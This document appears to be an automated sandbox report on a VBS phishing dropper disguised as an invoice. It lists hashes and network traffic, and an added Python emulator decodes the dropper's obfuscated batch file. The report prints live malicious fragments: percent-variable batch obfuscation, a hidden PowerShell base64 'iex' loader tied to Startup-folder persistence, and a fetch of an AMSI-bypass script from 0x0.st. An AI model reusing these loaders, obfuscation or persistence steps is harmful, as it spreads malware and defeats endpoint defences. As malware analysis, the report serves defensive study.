                                      Malicious:false
                                      Preview:@...e...........................................................
                                      Process:C:\Windows\System32\wscript.exe
                                      File Type:ASCII text, with very long lines (48450), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):56561
                                      Entropy (8bit):6.027350559479858
                                      Encrypted:false
                                      SSDEEP:768:a9YLNQaBdGzFXP/3gXI6URGzFj85FGB9W3Q3ZhGAivdgcKd7RPZ125tA/Ue5ZU:a9iQMGZXPvgXyFGT9Vilgvd7RB05OMuK
                                      MD5:1253161AB88164ACED63B968FDA12398
                                      SHA1:B73D8097228AF78929B537B6207BE49DE663A4E4
                                      SHA-256:717B2E04CDC8C7252AA6C77B2204C2ED2BE1EFC3192345811B27B68E9E969105
                                      SHA-512:69C61264594BF4BE08C856BB240D6417699C75BA2513BAB2F00F19A74C3DFACAB8E1DD6C18CE43AE2A4E00F1E26EAD6B4EC4D244F5085D450364544BA0EDA43D
                                      Malicious:true
                                      Preview:%WKBFIIKRWUUNZDG%@%WKBFIIKRWUUNZDG%e%WKBFIIKRWUUNZDG%c%WKBFIIKRWUUNZDG%h%WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG% %WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%..%OAV%s%OAV%e%OAV%t%OAV%l%OAV%o%OAV%c%OAV%a%OAV%l%OAV% %OAV%e%OAV%n%OAV%a%OAV%b%OAV%l%OAV%e%OAV%d%OAV%e%OAV%l%OAV%a%OAV%y%OAV%e%OAV%d%OAV%e%OAV%x%OAV%p%OAV%a%OAV%n%OAV%s%OAV%i%OAV%o%OAV%n..%MWF%s%MWF%e%MWF%t%MWF% "GZTDNJ=%MWF%OULDEs%OULDEMWF%e%MWF%OULDEt%MWF%OULDE ZDZOULDEJ=1 &OULDE&OULDE %MWFOULDE%s%MWF%OULDEt%MWF%aOULDE%MWF%rOULDE%MWF%OULDEt%OULDEMWFOULDE%OULDE "" /OULDEminOULDE OULDE"..%WZQ%s%WZQ%e%WZQ%t%WZQ% "IVCXSO=&& OULDEexitOULDE"..%GUM%s%GUM%e%GUM%t%GUM% "AKMRNV=%GUM%nOULDE%GUMOULDE%OULDEo%GUM%OULDEt%GUMOULDE% %GUM%OULDEd%GUM%OULDEe%OULDEGUM%fOULDE%GUMOULDE%iOULDE%GUM%nOULDE%GUMOULDE%e%OULDEGUM%d%OULDEGUM%OULDE ZDOULDEZJOULDE..%OYV%i%OYV%f%OYV% %AKMRNV:OULDE=% (%GZTDNJ:OULDE=%%0 %IVCXSO:OULDE=%)..::KxTWIi9guyjF7tfG57+5GIF7QiGzRahVE/ZnciTu0akmSkYpWygbIG+SFSGFODecAh3n19LPuSyKsKyLFMGyxfYL8QjEGJlD2r5+1bt
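The preview above shows how the dropped batch file hides its commands: every character is separated by a reference to an environment variable that is never defined (inside a batch file cmd.exe expands an undefined %VAR% to nothing), the real command text is stored in variables with the junk token OULDE spliced into it, and the final line recovers it with cmd's %VAR:OULDE=% substring replacement. Because all of this happens at expansion time, the bytes on disk never contain the commands that run. The emulator of cmd.exe percent-expansion below is added here as an example and is not part of the Joe Sandbox report or of the sample; it is fed the six lines copied from the preview, and the script name it substitutes for %0 is an assumption.

```python
import re

# The six leading lines of the dropped 3h6QL1gQ.bat, copied from the report's
# preview (the preview renders each CRLF as ".."). The "::KxTW..." comment line
# that follows them is truncated in the preview and is not needed for this step.
SAMPLE_BAT_LINES = [
    '%WKBFIIKRWUUNZDG%@%WKBFIIKRWUUNZDG%e%WKBFIIKRWUUNZDG%c%WKBFIIKRWUUNZDG%h%WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG% %WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%',
    '%OAV%s%OAV%e%OAV%t%OAV%l%OAV%o%OAV%c%OAV%a%OAV%l%OAV% %OAV%e%OAV%n%OAV%a%OAV%b%OAV%l%OAV%e%OAV%d%OAV%e%OAV%l%OAV%a%OAV%y%OAV%e%OAV%d%OAV%e%OAV%x%OAV%p%OAV%a%OAV%n%OAV%s%OAV%i%OAV%o%OAV%n',
    '%MWF%s%MWF%e%MWF%t%MWF% "GZTDNJ=%MWF%OULDEs%OULDEMWF%e%MWF%OULDEt%MWF%OULDE ZDZOULDEJ=1 &OULDE&OULDE %MWFOULDE%s%MWF%OULDEt%MWF%aOULDE%MWF%rOULDE%MWF%OULDEt%OULDEMWFOULDE%OULDE "" /OULDEminOULDE OULDE"',
    '%WZQ%s%WZQ%e%WZQ%t%WZQ% "IVCXSO=&& OULDEexitOULDE"',
    '%GUM%s%GUM%e%GUM%t%GUM% "AKMRNV=%GUM%nOULDE%GUMOULDE%OULDEo%GUM%OULDEt%GUMOULDE% %GUM%OULDEd%GUM%OULDEe%OULDEGUM%fOULDE%GUMOULDE%iOULDE%GUM%nOULDE%GUMOULDE%e%OULDEGUM%d%OULDEGUM%OULDE ZDOULDEZJOULDE"',
    '%OYV%i%OYV%f%OYV% %AKMRNV:OULDE=% (%GZTDNJ:OULDE=%%0 %IVCXSO:OULDE=%)',
]


def expand_percent(line, env, args=("script.bat",)):
    """Emulate cmd.exe batch-mode %-expansion of one line.

    Handles %% -> %, %0..%9 -> batch parameters, %VAR% -> value (an undefined
    variable expands to nothing, which is what the obfuscator relies on) and
    %VAR:old=new% -> case-insensitive substring replacement. The ~substring
    form and !delayed! expansion are not modelled; the sample uses neither.
    """
    out, i, n = [], 0, len(line)
    while i < n:
        if line[i] != "%":
            out.append(line[i])
            i += 1
            continue
        if i + 1 < n and line[i + 1] == "%":        # literal percent sign
            out.append("%")
            i += 2
            continue
        if i + 1 < n and line[i + 1].isdigit():      # %0 .. %9
            k = int(line[i + 1])
            out.append(args[k] if k < len(args) else "")
            i += 2
            continue
        j = line.find("%", i + 1)
        if j == -1:                                  # unterminated: cmd drops it
            i += 1
            continue
        name, sep, mod = line[i + 1:j].partition(":")
        value = env.get(name.upper(), "")            # undefined -> empty string
        if sep and "=" in mod:
            old, _, new = mod.partition("=")
            if old:
                value = re.sub(re.escape(old), lambda _m: new, value, flags=re.IGNORECASE)
        out.append(value)
        i = j + 1
    return "".join(out)


def parse_set(cmdline):
    """Return (NAME, value) for a `set NAME=value` or `set "NAME=value"` line, else None."""
    m = re.match(r"\s*set\s+(.*)$", cmdline, re.IGNORECASE)
    if not m:
        return None
    rest = m.group(1).strip()
    if rest.startswith('"') and rest.count('"') >= 2:
        rest = rest[1:rest.rfind('"')]               # cmd keeps everything up to the last quote
    name, sep, value = rest.partition("=")
    return (name.strip().upper(), value) if sep else None


def deobfuscate(lines, script_name="3h6QL1gQ.bat"):
    """Expand each line against the variables defined so far; return (decoded_lines, env).

    script_name is what %0 expands to and is an assumption for the example."""
    env, decoded = {}, []
    for raw in lines:
        line = expand_percent(raw, env, (script_name,))
        if not line.strip():
            continue
        parsed = parse_set(line)
        if parsed:
            env[parsed[0]] = parsed[1]
        decoded.append(line)
    return decoded, env


if __name__ == "__main__":
    for line in deobfuscate(SAMPLE_BAT_LINES)[0]:
        print(line)
```

The recovered last line reads `if not defined ZDZJ (set ZDZJ=1 && start "" /min 3h6QL1gQ.bat && exit)`: the script relaunches itself minimized with a guard variable set so the second instance skips the relaunch, and the visible first instance exits. The three `set` lines still carry the OULDE tokens on purpose, since cmd only strips them when the values are read back. A scanner that wants the real commands has to perform this expansion rather than match the file bytes.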
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with very long lines (48450), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):56561
                                      Entropy (8bit):6.027350559479858
                                      Encrypted:false
                                      SSDEEP:768:a9YLNQaBdGzFXP/3gXI6URGzFj85FGB9W3Q3ZhGAivdgcKd7RPZ125tA/Ue5ZU:a9iQMGZXPvgXyFGT9Vilgvd7RB05OMuK
                                      MD5:1253161AB88164ACED63B968FDA12398
                                      SHA1:B73D8097228AF78929B537B6207BE49DE663A4E4
                                      SHA-256:717B2E04CDC8C7252AA6C77B2204C2ED2BE1EFC3192345811B27B68E9E969105
                                      SHA-512:69C61264594BF4BE08C856BB240D6417699C75BA2513BAB2F00F19A74C3DFACAB8E1DD6C18CE43AE2A4E00F1E26EAD6B4EC4D244F5085D450364544BA0EDA43D
                                      Malicious:true
                                      Preview:%WKBFIIKRWUUNZDG%@%WKBFIIKRWUUNZDG%e%WKBFIIKRWUUNZDG%c%WKBFIIKRWUUNZDG%h%WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG% %WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%..%OAV%s%OAV%e%OAV%t%OAV%l%OAV%o%OAV%c%OAV%a%OAV%l%OAV% %OAV%e%OAV%n%OAV%a%OAV%b%OAV%l%OAV%e%OAV%d%OAV%e%OAV%l%OAV%a%OAV%y%OAV%e%OAV%d%OAV%e%OAV%x%OAV%p%OAV%a%OAV%n%OAV%s%OAV%i%OAV%o%OAV%n..%MWF%s%MWF%e%MWF%t%MWF% "GZTDNJ=%MWF%OULDEs%OULDEMWF%e%MWF%OULDEt%MWF%OULDE ZDZOULDEJ=1 &OULDE&OULDE %MWFOULDE%s%MWF%OULDEt%MWF%aOULDE%MWF%rOULDE%MWF%OULDEt%OULDEMWFOULDE%OULDE "" /OULDEminOULDE OULDE"..%WZQ%s%WZQ%e%WZQ%t%WZQ% "IVCXSO=&& OULDEexitOULDE"..%GUM%s%GUM%e%GUM%t%GUM% "AKMRNV=%GUM%nOULDE%GUMOULDE%OULDEo%GUM%OULDEt%GUMOULDE% %GUM%OULDEd%GUM%OULDEe%OULDEGUM%fOULDE%GUMOULDE%iOULDE%GUM%nOULDE%GUMOULDE%e%OULDEGUM%d%OULDEGUM%OULDE ZDOULDEZJOULDE..%OYV%i%OYV%f%OYV% %AKMRNV:OULDE=% (%GZTDNJ:OULDE=%%0 %IVCXSO:OULDE=%)..::KxTWIi9guyjF7tfG57+5GIF7QiGzRahVE/ZnciTu0akmSkYpWygbIG+SFSGFODecAh3n19LPuSyKsKyLFMGyxfYL8QjEGJlD2r5+1bt
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with very long lines (2521), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):2523
                                      Entropy (8bit):5.874461665160376
                                      Encrypted:false
                                      SSDEEP:48:duo1KrhTBA0CboECaEO52CK75R8A336Ye1pRL18RTYRxdKB3bqjB3MqF1XXrrvfk:cOg4yIA3Pe1pdey7QBejBcGVrrrjFSFp
                                      MD5:3CE96D4D64179D91F8FF7C83323C5729
                                      SHA1:20A8BA79860A54E395A0AEBA48E1F30204A92D26
                                      SHA-256:4CB025A66DC6D0B84CE9DA3B440D83BA6322CCD8C52E11575017C7DB9191A34B
                                      SHA-512:03E63C3429BFAECA86F782E4408F083824E6EB4BC0D6F6D3950EBF3768255A918B09C02676B66B3A92E5FBFF19AADD510FEF4FD925C76E7D92181E8D503BA5E4
                                      Malicious:false
                                      Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSS
                                      File type:ASCII text, with very long lines (48468), with CRLF line terminators
                                      Entropy (8bit):6.0406775911938695
                                      TrID:
                                        File name:Commercial Invoice Confirmation-1132346.vbs
                                        File size:57'188 bytes
                                        MD5:f268af24198f756977b03b521f23e96c
                                        SHA1:b5ae78ce8541943b14f48c5003d0c2e306bfae96
                                        SHA256:ac3080be59227ea4650f78500acb8b8de9d2e51089b5d39475ba9b368731b8a6
                                        SHA512:c1fd961d00a1d1c619b224a224a08a29778908e406049845f5e55fbabc88bf34fa9eb3b1a810577f1b54cc89941bfea5dde530a262f7f33401a02b10a42de904
                                        SSDEEP:768:zU5lZeh9YLNQaBdGzFXP/3gXI6URGzFj85FGB9W3Q3ZhGAivdgcKd7RPZ125tA/v:V9iQMGZXPvgXyFGT9Vilgvd7RB05OMkX
                                        TLSH:8C43E1BB6D1DBB9A439819A926FE4B65C3FE0DA35052FF6B430D1A34DCA00935731C1A
                                        File Content Preview:Dim ePIyN : ePIyN = 2..Dim CVmVy : Set CVmVy = CreateObject("Scripting.FileSystemObject")..Dim GVuEO : GVuEO = CVmVy.GetSpecialFolder(2)....Dim pSoHg..pSoHg = "3h6QL1gQ.bat"..Set AdrDb = CVmVy.CreateTextFile(GVuEO & "\" & pSoHg, True)..AdrDb.writeline "%W
                                        Icon Hash:68d69b8f86ab9a86
                                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                          2025-02-18T08:24:33.715621+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.8 | 49705 | 168.119.145.117 | 443 | TCP
                                          2025-02-18T08:24:35.435140+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49706 | 132.226.247.73 | 80 | TCP
                                          2025-02-18T08:24:49.980780+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.8 | 49710 | 168.119.145.117 | 443 | TCP
                                          2025-02-18T08:24:51.638349+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49711 | 132.226.247.73 | 80 | TCP
                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Feb 18, 2025 08:24:32.718616009 CET | 56255 | 53 | 192.168.2.8 | 1.1.1.1
                                          Feb 18, 2025 08:24:32.732043982 CET | 53 | 56255 | 1.1.1.1 | 192.168.2.8
                                          Feb 18, 2025 08:24:34.498658895 CET | 58033 | 53 | 192.168.2.8 | 1.1.1.1
                                          Feb 18, 2025 08:24:34.506557941 CET | 53 | 58033 | 1.1.1.1 | 192.168.2.8
                                          Feb 18, 2025 08:24:35.389699936 CET | 59436 | 53 | 192.168.2.8 | 1.1.1.1
                                          Feb 18, 2025 08:24:35.399945974 CET | 53 | 59436 | 1.1.1.1 | 192.168.2.8
                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                          Feb 18, 2025 08:24:32.718616009 CET | 192.168.2.8 | 1.1.1.1 | 0x477f | Standard query (0) | 0x0.st | A (IP address) | IN (0x0001) | false
                                          Feb 18, 2025 08:24:34.498658895 CET | 192.168.2.8 | 1.1.1.1 | 0xf30b | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
                                          Feb 18, 2025 08:24:35.389699936 CET | 192.168.2.8 | 1.1.1.1 | 0x67c6 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                          Feb 18, 2025 08:24:32.732043982 CET | 1.1.1.1 | 192.168.2.8 | 0x477f | No error (0) | 0x0.st | | 168.119.145.117 | A (IP address) | IN (0x0001) | false
                                          Feb 18, 2025 08:24:34.506557941 CET | 1.1.1.1 | 192.168.2.8 | 0xf30b | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
                                          Feb 18, 2025 08:24:34.506557941 CET | 1.1.1.1 | 192.168.2.8 | 0xf30b | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
                                          Feb 18, 2025 08:24:34.506557941 CET | 1.1.1.1 | 192.168.2.8 | 0xf30b | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
                                          Feb 18, 2025 08:24:34.506557941 CET | 1.1.1.1 | 192.168.2.8 | 0xf30b | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
                                          Feb 18, 2025 08:24:34.506557941 CET | 1.1.1.1 | 192.168.2.8 | 0xf30b | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
                                          Feb 18, 2025 08:24:34.506557941 CET | 1.1.1.1 | 192.168.2.8 | 0xf30b | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
                                          Feb 18, 2025 08:24:35.399945974 CET | 1.1.1.1 | 192.168.2.8 | 0x67c6 | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
                                          Feb 18, 2025 08:24:35.399945974 CET | 1.1.1.1 | 192.168.2.8 | 0x67c6 | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
                                          Feb 18, 2025 08:24:35.399945974 CET | 1.1.1.1 | 192.168.2.8 | 0x67c6 | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
                                          Feb 18, 2025 08:24:35.399945974 CET | 1.1.1.1 | 192.168.2.8 | 0x67c6 | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
                                          Feb 18, 2025 08:24:35.399945974 CET | 1.1.1.1 | 192.168.2.8 | 0x67c6 | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
                                          Feb 18, 2025 08:24:35.399945974 CET | 1.1.1.1 | 192.168.2.8 | 0x67c6 | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
                                          Feb 18, 2025 08:24:35.399945974 CET | 1.1.1.1 | 192.168.2.8 | 0x67c6 | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
                                        • 0x0.st
                                        • reallyfreegeoip.org
                                        • checkip.dyndns.org
                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          0 | 192.168.2.8 | 49706 | 132.226.247.73 | 80 | 8044 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Feb 18, 2025 08:24:34.512546062 CET | 151 | OUT | GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Feb 18, 2025 08:24:35.178303003 CET | 273 | IN | HTTP/1.1 200 OK
                                          Date: Tue, 18 Feb 2025 07:24:35 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                          Feb 18, 2025 08:24:35.184533119 CET | 127 | OUT | GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Feb 18, 2025 08:24:35.388596058 CET | 273 | IN | HTTP/1.1 200 OK
                                          Date: Tue, 18 Feb 2025 07:24:35 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.8 | 49711 | 132.226.247.73 | 80 | 1984 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Feb 18, 2025 08:24:50.694785118 CET | 151 | OUT | GET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Feb 18, 2025 08:24:51.362696886 CET | 273 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 18 Feb 2025 07:24:51 GMT
                                        Content-Type: text/html
                                        Content-Length: 104
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                        Feb 18, 2025 08:24:51.365309000 CET | 127 | OUT | GET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Feb 18, 2025 08:24:51.587985039 CET | 273 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 18 Feb 2025 07:24:51 GMT
                                        Content-Type: text/html
                                        Content-Length: 104
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.8 | 49705 | 168.119.145.117 | 443 | 8044 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-02-18 07:24:33 UTC | 159 | OUT | GET /8ZDa.txt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: 0x0.st
                                        Connection: Keep-Alive
                                        2025-02-18 07:24:33 UTC | 611 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 18 Feb 2025 07:24:33 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 9193
                                        Last-Modified: Thu, 13 Feb 2025 16:29:51 GMT
                                        Connection: close
                                        Vary: Accept-Encoding
                                        ETag: "67ae1dff-23e9"
                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                        X-Frame-Options: sameorigin
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        Content-Security-Policy: default-src 'none'; media-src 'self'; style-src 'none' 'unsafe-inline'; img-src 'self'
                                        Referrer-Policy: no-referrer, strict-origin-when-cross-origin
                                        Accept-Ranges: bytes
                                        2025-02-18 07:24:33 UTC | 9193 | IN | Data Raw: 66 75 6e 63 74 69 6f 6e 20 49 6e 76 6f 6b 65 2d 53 79 73 74 65 6d 41 6d 73 69 42 79 70 61 73 73 20 7b 0d 0a 20 20 20 20 5b 43 6d 64 6c 65 74 42 69 6e 64 69 6e 67 28 29 5d 0d 0a 20 20 20 20 70 61 72 61 6d 20 28 0d 0a 20 20 20 20 20 20 20 20 5b 50 61 72 61 6d 65 74 65 72 28 50 61 72 61 6d 65 74 65 72 53 65 74 4e 61 6d 65 20 3d 20 27 49 6e 74 65 72 66 61 63 65 27 2c 20 4d 61 6e 64 61 74 6f 72 79 20 3d 20 24 66 61 6c 73 65 2c 20 50 6f 73 69 74 69 6f 6e 20 3d 20 30 29 5d 0d 0a 20 20 20 20 20 20 20 20 5b 73 77 69 74 63 68 5d 20 24 56 65 72 62 6f 73 65 4f 75 74 70 75 74 2c 0d 0a 0d 0a 20 20 20 20 20 20 20 20 5b 50 61 72 61 6d 65 74 65 72 28 50 61 72 61 6d 65 74 65 72 53 65 74 4e 61 6d 65 20 3d 20 27 49 6e 74 65 72 66 61 63 65 27 2c 20 4d 61 6e 64 61 74 6f 72 79
                                        Data Ascii: function Invoke-SystemAmsiBypass { [CmdletBinding()] param ( [Parameter(ParameterSetName = 'Interface', Mandatory = $false, Position = 0)] [switch] $VerboseOutput, [Parameter(ParameterSetName = 'Interface', Mandatory


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.8 | 49707 | 104.21.16.1 | 443 | 8044 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-02-18 07:24:35 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2025-02-18 07:24:35 UTC | 855 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 18 Feb 2025 07:24:35 GMT
                                        Content-Type: text/xml
                                        Content-Length: 362
                                        Connection: close
                                        Age: 95244
                                        Cache-Control: max-age=31536000
                                        cf-cache-status: HIT
                                        last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MQmsDwDsmkFdA7PM%2Bkp9uU0pAB3WaZ0ycLSHmCCbRM9Z6CNOfR%2FCtSkKxlYrE93hWKbNmrCm6XtpfQOp0Zfiu%2BPT13o1szlGUfuNR45Sua%2BrTLyUrwAUjnH32wha2kKWzwg3deZ1"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 913c47449d2f41ba-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1725&rtt_var=655&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1660034&cwnd=198&unsent_bytes=0&cid=a0bfca836e470405&ts=145&x=0"
